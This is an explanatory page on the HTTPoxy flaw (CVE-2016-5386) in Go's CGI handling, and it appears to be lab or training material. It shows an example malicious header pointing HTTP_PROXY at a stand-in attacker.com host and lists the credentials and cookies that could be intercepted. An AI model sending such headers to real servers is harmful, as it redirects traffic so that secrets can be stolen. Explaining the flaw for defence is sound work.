cve-2016-5386-httpoxy-golang-cgi

CVE-2016-5386: HTTPoxy (Golang CGI)

This vulnerability impacts an old version of Golang HTTP library when used as a CGI. This vulnerability is actually a type of a bug that was re-discovered in 2016 under the name HTTPoxy and impacts few other libraries. For more details, you can check out httpoxy.org.

Root cause

CGI servers:
- Convert HTTP headers into environment variables
- Adds a prefix HTTP_
- Capitalizes header names

Example:

Host: example.com
↓ converts it as
HTTP_HOST=example.com

This is meant to prevent overwriting sensitive env vars
BUT a dangerous variable already exists:

HTTP_PROXY

Why `HTTP_PROXY` is dangerous

Many HTTP clients (including Go):
- Automatically respect HTTP_PROXY
- Use it when making outbound HTTP requests
Result:
- Attacker can controls where the CGI sends its requests

Vulnerable behavior

Attacker sends this header:

Proxy: http://attacker.com:8080

Web server converts it to:

HTTP_PROXY=http://attacker.com:8080

Golang HTTP client:
- Reads HTTP_PROXY
- Routes all outgoing requests through attacker proxy

What attacker can steal

Authorization headers
Cookies
API keys
User-Agent
Internal service requests
Internal IPs (network mapping)

info

All versions of Apache after 2.2.23 prevent this attack by blocking the Proxy header all together. In those version, a system administrator will need to recompile Apache to make the server vulnerable.

CVE-2016-5386: HTTPoxy (Golang CGI)​

Root cause​

Why HTTP_PROXY is dangerous​

Vulnerable behavior​

What attacker can steal​

CVE-2016-5386: HTTPoxy (Golang CGI)

Root cause

Why `HTTP_PROXY` is dangerous

Vulnerable behavior

What attacker can steal